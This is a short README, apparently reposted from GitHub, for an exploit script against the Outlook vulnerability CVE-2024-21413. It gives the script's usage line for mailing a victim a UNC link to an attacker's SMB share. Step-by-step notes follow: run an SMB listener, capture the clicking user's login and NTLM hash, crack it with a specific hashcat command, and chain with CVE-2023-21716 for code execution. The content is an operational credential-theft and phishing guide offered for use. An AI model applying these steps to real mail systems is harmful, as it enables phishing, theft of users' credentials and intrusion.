CVE-2024-21413 Microsoft Outlook Remote Code Execution Vulnerability

📜 CVE-2024-21413 Microsoft Outlook Remote Code Execution Vulnerability

Microsoft Outlook Leak credentials & Remote Code Execution Vulnerability when chained with CVE-2023-21716. Outlook should warn you about the risk on opening an external link => but this is not the case!

🚀 usage:

./cve-2024-21413.sh mx.fqdn port sender recipient url

example:

./cve-2024-21413.sh mail.mydomain.com 25 [email protected] [email protected] "\\xx.xx.xx.xx\test\duy31.txt"

notes:

chmod +x cve-2024-21413.sh

require app expect & require legitimate ip sender and email sender (to pass SPF, DKIM, DMARC)

• First run a smb listener like that

• Run the poc

• and wait for the email & in the preview windows click on the link

• then you should retrieve the login & hash of the person that clicked on the link (without the warning prompt on affected outlook version)

• You can then try to crack the password with hashcat. Just copy all the line with the login name to a file and run hashcat with module 5600

hashcat -a 0 -m 5600 hash.txt rockyou.txt -o cracked.txt -O

You can chain this CVE with CVE-2023-21716 to obtain RCE !!!

原文始发于Github：CVE-2024-21413 Microsoft Outlook Remote Code Execution Vulnerability